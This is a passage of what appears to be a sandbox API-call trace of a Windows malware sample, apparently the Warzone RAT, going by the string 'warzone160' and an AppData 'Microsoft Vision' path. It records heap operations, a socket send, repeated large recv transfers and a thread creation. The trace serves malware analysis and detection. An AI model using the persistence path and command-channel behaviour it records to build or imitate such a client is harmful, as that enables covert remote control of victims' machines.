(HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934958 [0198.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned 61 [0198.879] GetProcessHeap () returned 0x900000 [0198.879] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934958, Size=0x80) returned 0x966a58 [0198.879] GetProcessHeap () returned 0x900000 [0198.879] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934958 [0198.879] GetProcessHeap () returned 0x900000 [0198.879] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934958, Size=0x8) returned 0x934878 [0198.879] GetProcessHeap () returned 0x900000 [0198.879] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934878, Size=0xc) returned 0x96e748 [0198.879] GetProcessHeap () returned 0x900000 [0198.879] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96e748, Size=0x8c) returned 0x96ce78 [0198.879] GetProcessHeap () returned 0x900000 [0198.879] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8c) returned 0x9707f8 [0198.879] GetProcessHeap () returned 0x900000 [0198.880] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x966a58 | out: hHeap=0x900000) returned 1 [0198.880] GetProcessHeap () returned 0x900000 [0198.880] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96ce78 | out: hHeap=0x900000) returned 1 [0198.880] VirtualFree (lpAddress=0x2d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.880] lstrlenA (lpString="warzone160") returned 10 [0198.880] lstrlenA (lpString="warzone160") returned 10 [0198.880] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0198.880] lstrcpyA (in: lpString1=0x2ce0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0198.880] lstrlenA (lpString="warzone160") returned 10 [0198.880] GetProcessHeap () returned 0x900000 [0198.880] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e748 [0198.880] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.880] GetProcessHeap () returned 0x900000 [0198.880] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8c) returned 0x96ce78 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e760 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8c) returned 0x970890 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8c) returned 0x970928 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970890 | out: hHeap=0x900000) returned 1 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96ce78 | out: hHeap=0x900000) returned 1 [0198.881] send (s=0x228, buf=0x970928*, len=140, flags=0) returned 140 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970928 | out: hHeap=0x900000) returned 1 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0198.881] GetProcessHeap () returned 0x900000 [0198.881] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9707f8 | out: hHeap=0x900000) returned 1 [0198.881] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.881] VirtualFree (lpAddress=0x2d00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.882] GetProcessHeap () returned 0x900000 [0198.882] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fd38 | out: hHeap=0x900000) returned 1 [0198.882] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0198.934] GetProcessHeap () returned 0x900000 [0198.934] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fd38 [0198.934] GetProcessHeap () returned 0x900000 [0198.934] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0198.934] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e760 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e778 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e778 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fd38 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fd38 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e748 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e778 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fd38 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e778 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.935] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9347a8 | out: hHeap=0x900000) returned 1 [0198.935] GetProcessHeap () returned 0x900000 [0198.936] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x9347a8 [0198.956] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0198.957] GetProcessHeap () returned 0x900000 [0198.957] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e778 [0198.957] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40aef5, lpParameter=0x96e778, dwCreationFlags=0x0, lpThreadId=0x54cf78 | out: lpThreadId=0x54cf78*=0x364) returned 0x294 [0198.958] GetProcessHeap () returned 0x900000 [0198.958] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0198.958] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0199.448] GetProcessHeap () returned 0x900000 [0199.448] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0199.449] GetProcessHeap () returned 0x900000 [0199.449] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0199.449] GetProcessHeap () returned 0x900000 [0199.449] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e7d8 [0199.449] GetProcessHeap () returned 0x900000 [0199.449] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0199.449] GetProcessHeap () returned 0x900000 [0199.449] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7a8 [0199.449] GetProcessHeap () returned 0x900000 [0199.449] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0199.449] GetProcessHeap () returned 0x900000 [0199.449] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0199.449] GetProcessHeap () returned 0x900000 [0199.449] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0199.449] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 2594 [0199.449] recv (in: s=0x228, buf=0x33ff1e, len=57422, flags=0 | out: buf=0x33ff1e*) returned 57422 [0199.978] GetProcessHeap () returned 0x900000 [0199.979] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0199.979] GetProcessHeap () returned 0x900000 [0199.979] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0199.979] GetProcessHeap () returned 0x900000 [0199.979] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0199.980] GetProcessHeap () returned 0x900000 [0199.980] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0199.980] GetProcessHeap () returned 0x900000 [0199.980] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0199.980] GetProcessHeap () returned 0x900000 [0199.980] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0199.981] GetProcessHeap () returned 0x900000 [0199.981] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x97fa58 [0199.982] GetProcessHeap () returned 0x900000 [0199.982] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0199.982] GetProcessHeap () returned 0x900000 [0199.982] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0199.982] GetProcessHeap () returned 0x900000 [0199.982] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x97fa58 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960750 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x93af70 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499d8 [0199.983] GetProcessHeap () returned 0x900000 [0199.983] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0199.984] GetProcessHeap () returned 0x900000 [0199.984] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x93af70 [0199.985] GetProcessHeap () returned 0x900000 [0199.985] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499d8 | out: hHeap=0x900000) returned 1 [0199.985] GetProcessHeap () returned 0x900000 [0199.985] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499d8 [0199.985] GetProcessHeap () returned 0x900000 [0199.985] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x98e4d0 [0199.986] GetProcessHeap () returned 0x900000 [0199.986] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499d8 | out: hHeap=0x900000) returned 1 [0199.986] GetProcessHeap () returned 0x900000 [0199.986] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0199.986] GetProcessHeap () returned 0x900000 [0199.986] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0199.988] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7a8 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e748 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7d8 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0199.988] GetProcessHeap () returned 0x900000 [0199.988] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0199.989] GetProcessHeap () returned 0x900000 [0199.989] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0199.989] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 2504 [0199.989] recv (in: s=0x228, buf=0x33fec4, len=57512, flags=0 | out: buf=0x33fec4*) returned 57512 [0200.278] GetProcessHeap () returned 0x900000 [0200.278] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0200.278] GetProcessHeap () returned 0x900000 [0200.278] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0200.278] GetProcessHeap () returned 0x900000 [0200.278] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0200.279] GetProcessHeap () returned 0x900000 [0200.279] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0200.280] GetProcessHeap () returned 0x900000 [0200.280] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0200.280] GetProcessHeap () returned 0x900000 [0200.280] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0200.281] GetProcessHeap () returned 0x900000 [0200.281] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x99cf38 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x99cf38 | out: hHeap=0x900000) returned 1 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x99cf38 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960770 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499f8 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x970fd0 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa38 [0200.282] GetProcessHeap () returned 0x900000 [0200.282] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0200.283] GetProcessHeap () returned 0x900000 [0200.283] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x970fd0 [0200.284] GetProcessHeap () returned 0x900000 [0200.284] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x98e4d0, Size=0x1d4c0) returned 0x9ab9b0 [0200.286] GetProcessHeap () returned 0x900000 [0200.286] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0200.287] GetProcessHeap () returned 0x900000 [0200.287] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa38 | out: hHeap=0x900000) returned 1 [0200.288] GetProcessHeap () returned 0x900000 [0200.288] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0200.288] GetProcessHeap () returned 0x900000 [0200.288] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x99cf38 | out: hHeap=0x900000) returned 1 [0200.288] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0200.288] GetProcessHeap () returned 0x900000 [0200.288] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0200.288] GetProcessHeap () returned 0x900000 [0200.288] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e760 [0200.288] GetProcessHeap () returned 0x900000 [0200.288] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e7a8 [0200.288] GetProcessHeap () returned 0x900000 [0200.288] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0200.288] GetProcessHeap () returned 0x900000 [0200.288] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7d8 [0200.289] GetProcessHeap () returned 0x900000 [0200.289] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0200.289] GetProcessHeap () returned 0x900000 [0200.289] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0200.289] GetProcessHeap () returned 0x900000 [0200.289] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0200.289] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 3568 [0200.289] recv (in: s=0x228, buf=0x3402ec, len=56448, flags=0 | out: buf=0x3402ec*) returned 56448 [0200.576] GetProcessHeap () returned 0x900000 [0200.577] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0200.577] GetProcessHeap () returned 0x900000 [0200.577] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0200.577] GetProcessHeap () returned 0x900000 [0200.577] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x93af70 [0200.577] GetProcessHeap () returned 0x900000 [0200.577] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x9499f8 [0200.578] GetProcessHeap () returned 0x900000 [0200.578] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e790 [0200.578] GetProcessHeap () returned 0x900000 [0200.578] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0200.579] GetProcessHeap () returned 0x900000 [0200.579] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x97fa58 [0200.579] GetProcessHeap () returned 0x900000 [0200.579] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0200.580] GetProcessHeap () returned 0x900000 [0200.580] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e790 | out: hHeap=0x900000) returned 1 [0200.581] GetProcessHeap () returned 0x900000 [0200.581] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499f8 | out: hHeap=0x900000) returned 1 [0200.581] GetProcessHeap () returned 0x900000 [0200.581] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea7c) returned 0x970fd0 [0200.582] GetProcessHeap () returned 0x900000 [0200.582] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0200.582] GetProcessHeap () returned 0x900000 [0200.582] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0200.582] GetProcessHeap () returned 0x900000 [0200.582] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea70) returned 0x93af70 [0200.582] GetProcessHeap () returned 0x900000 [0200.582] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960790 [0200.582] GetProcessHeap () returned 0x900000 [0200.582] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499e8 [0200.582] GetProcessHeap () returned 0x900000 [0200.583] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa58 [0200.583] GetProcessHeap () returned 0x900000 [0200.583] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499e8 | out: hHeap=0x900000) returned 1 [0200.583] GetProcessHeap () returned 0x900000 [0200.583] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x9499e8 [0200.583] GetProcessHeap () returned 0x900000 [0200.583] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0200.583] GetProcessHeap () returned 0x900000 [0200.583] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xea60) returned 0x97fa58 [0200.583] GetProcessHeap () returned 0x900000 [0200.583] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x9ab9b0, Size=0x2bf20) returned 0x9c8e78 [0200.585] GetProcessHeap () returned 0x900000 [0200.585] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x97fa58 | out: hHeap=0x900000) returned 1 [0200.585] GetProcessHeap () returned 0x900000 [0200.585] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9499e8 | out: hHeap=0x900000) returned 1 [0200.587] GetProcessHeap () returned 0x900000 [0200.587] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x900000) returned 1 [0200.587] GetProcessHeap () returned 0x900000 [0200.587] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x93af70 | out: hHeap=0x900000) returned 1 [0200.588] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0200.588] GetProcessHeap () returned 0x900000 [0200.588] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e790 [0200.588] GetProcessHeap () returned 0x900000 [0200.588] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7d8 [0200.588] GetProcessHeap () returned 0x900000 [0200.588] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e760 [0200.588] GetProcessHeap () returned 0x900000 [0200.588] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e7a8 [0200.588] GetProcessHeap () returned 0x900000 [0200.588] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x96e748 [0200.588] GetProcessHeap () returned 0x900000 [0200.588] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7a8 | out: hHeap=0x900000) returned 1 [0200.588] GetProcessHeap () returned 0x900000 [0200.588] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0200.589] GetProcessHeap () returned 0x900000 [0200.589] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e7d8 | out: hHeap=0x900000) returned 1 [0200.589] recv (in: s=0x228, buf=0x33f4fc, len=60016, flags=0 | out: buf=0x33f4fc*) returned 8690 [0200.589] recv (in: s=0x228, buf=0x3416ee, len=51326, flags=0 | out: buf=0x3416ee*) returned 3472 [0200.595] recv (in: s=0x228, buf=0x34247e, len=47854, flags=0 | out: buf=0x34247e*) returned 437 [0200.595] recv (in: s=0x228, buf=0x342633, len=47417, flags=0 | out: buf=0x342633*) returned 47417 [0200.811] GetProcessHeap () returned 